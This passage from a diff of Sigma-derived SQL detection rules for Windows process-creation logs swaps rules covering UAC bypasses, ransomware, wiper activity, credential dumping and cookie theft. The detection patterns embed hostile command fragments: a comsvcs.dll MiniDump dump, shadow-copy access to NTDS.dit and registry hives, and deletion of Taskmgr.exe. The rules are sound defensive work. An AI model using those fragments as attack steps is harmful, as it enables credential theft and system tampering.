%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": 
"e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or 
modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT 
(((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND 
CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x 
=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects 
a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. 
As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' 
switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper 
malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": 
"eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": 
"a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' 
ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND 
CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": 